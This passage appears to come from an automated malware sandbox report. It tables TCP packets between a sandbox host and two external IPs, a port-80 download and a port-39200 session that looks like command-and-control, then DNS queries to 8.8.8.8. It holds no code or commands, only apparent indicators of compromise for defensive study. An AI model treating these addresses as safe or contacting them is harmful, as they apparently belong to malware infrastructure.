Aug 3, 2021 09:52:02.939224958 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.939250946 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.939280033 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.939304113 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.939328909 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.939338923 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.939356089 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.939382076 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.939404011 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.939405918 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.939433098 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.939435959 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.939460039 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.939471960 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.939490080 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.939513922 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.939517021 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.939551115 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.939591885 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.984806061 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.984843969 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.984868050 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.984889030 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.984908104 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.984910011 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.984931946 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.984947920 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.984961987 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.984982967 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.984985113 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.985009909 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985011101 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.985035896 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985054970 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.985057116 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985080004 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985100031 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985100985 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.985121965 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985131979 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.985161066 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985183954 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985197067 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.985246897 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.985260963 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985286951 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985302925 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.985306978 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985328913 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985346079 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.985351086 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985380888 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.985395908 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985414982 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.985419989 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985445023 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.985445976 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985466957 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.985470057 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985493898 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985501051 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.985518932 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985527992 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.985543966 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985548019 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.985567093 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985574961 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.985591888 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985594988 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.985616922 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985618114 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.985642910 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.985642910 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985668898 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985671997 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.985691071 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985694885 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.985713959 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985723019 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.985739946 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.985753059 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.985789061 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.987111092 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.987179041 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.987204075 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.987226963 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.987247944 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.987251043 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.987268925 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.987287045 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.987292051 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.987313986 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.987334013 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.987338066 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.987353086 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.987379074 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.987385988 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.987401009 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.987417936 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.987423897 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.987442017 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.987447977 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.987476110 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.987500906 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.032501936 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.032546997 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.032587051 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.032612085 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.032655001 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.032696009 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.033401012 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.033437967 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.033459902 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.033485889 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.033507109 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.033525944 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.033531904 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.033555031 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.033576965 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.033597946 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.033615112 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.033615112 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.033633947 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.033684015 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.033705950 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.033727884 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.033750057 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.033895016 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.033906937 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.033937931 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.033966064 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.033998966 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.034007072 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.034030914 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.034038067 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.034050941 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.034060955 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.034075022 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.034085035 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.034101009 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.034117937 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.034123898 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.034145117 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.034152031 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.034164906 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.034177065 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.034188986 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.034209967 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.034209967 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.034234047 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.034255981 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.034276009 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.034276009 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.034301043 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.034343958 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.034447908 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.034473896 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.034486055 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.034511089 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.034521103 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.034548044 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.034559011 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.034571886 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.034589052 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.034605026 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.035096884 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.035161972 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.035186052 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.035190105 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.035209894 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.035226107 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.035232067 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.035249949 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.035260916 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.035283089 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.035285950 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.035305023 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.035319090 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.035326958 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.035337925 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.035373926 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.079540014 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.079577923 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.079595089 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.079619884 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.079642057 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.079679966 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.079747915 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.081828117 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.081864119 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.081887007 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.081908941 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.081929922 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.081950903 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.081952095 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.081971884 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.081990004 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.081994057 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.082016945 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.082029104 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.082041025 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.082062006 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.082063913 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.082088947 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.082138062 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.082154036 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.082173109 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.082191944 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.082199097 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.082214117 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.082223892 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.082236052 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.082259893 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.082264900 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.082282066 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.082302094 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.082312107 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.082324028 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.082345009 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.082348108 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.082366943 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.082371950 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.082406998 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.082741976 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.082772970 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.082803965 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.082828999 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.082830906 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.082856894 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.082859993 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.082880020 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.082890987 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.082905054 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.082915068 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.082928896 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.082952976 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.082962036 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.082973003 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.082989931 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.082993031 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.083017111 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.083029032 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.083039045 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.083055973 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.083090067 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.083213091 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.083287001 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.083308935 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.083329916 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.083352089 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.083355904 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.083374023 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.083393097 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.083396912 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.083412886 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.083430052 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.083435059 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.083451033 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.083458900 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.083487988 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.083513021 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.126316071 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.126363993 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.126389027 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.126411915 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.126435995 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.126564026 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.128482103 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.128521919 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.128549099 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.128571987 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.128593922 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.128606081 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.128612995 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.128622055 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.128632069 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.128648996 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.128664017 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.128715992 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.128743887 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.128786087 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.128808022 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.128829956 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.128851891 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.128864050 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.128878117 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.128901958 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.128925085 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.128957033 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.128961086 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.128981113 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.129003048 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.129004955 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.129026890 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.129029989 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.129049063 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:03.129071951 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.129096031 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:03.848718882 CEST	49733	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 09:52:03.895325899 CEST	39200	49733	194.5.97.128	192.168.2.3
Aug 3, 2021 09:52:03.896202087 CEST	49733	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 09:52:03.906464100 CEST	49733	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 09:52:03.957334995 CEST	39200	49733	194.5.97.128	192.168.2.3
Aug 3, 2021 09:52:04.003839016 CEST	49733	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 09:52:04.049552917 CEST	39200	49733	194.5.97.128	192.168.2.3
Aug 3, 2021 09:52:04.066673040 CEST	49733	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 09:52:04.135514975 CEST	39200	49733	194.5.97.128	192.168.2.3
Aug 3, 2021 09:52:04.135736942 CEST	49733	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 09:52:04.200131893 CEST	39200	49733	194.5.97.128	192.168.2.3
Aug 3, 2021 09:52:04.225843906 CEST	39200	49733	194.5.97.128	192.168.2.3
Aug 3, 2021 09:52:04.229080915 CEST	49733	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 09:52:04.309437037 CEST	39200	49733	194.5.97.128	192.168.2.3
Aug 3, 2021 09:52:08.172015905 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:08.172178030 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:14.229147911 CEST	39200	49733	194.5.97.128	192.168.2.3
Aug 3, 2021 09:52:14.233493090 CEST	49733	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 09:52:14.307416916 CEST	39200	49733	194.5.97.128	192.168.2.3
Aug 3, 2021 09:52:14.684644938 CEST	39200	49733	194.5.97.128	192.168.2.3
Aug 3, 2021 09:52:14.738715887 CEST	49733	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 09:52:18.370467901 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:18.370568037 CEST	49733	39200	192.168.2.3	194.5.97.128

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 09:50:02.068259001 CEST	49199	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:02.100552082 CEST	50620	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:02.103404999 CEST	53	49199	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:02.135581970 CEST	53	50620	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:03.751369953 CEST	64938	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:03.779362917 CEST	53	64938	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:04.804028034 CEST	60152	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:04.829040051 CEST	53	60152	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:05.845832109 CEST	57544	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:05.873245955 CEST	53	57544	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:07.138077021 CEST	55984	53	192.168.2.3	8.8.8.8
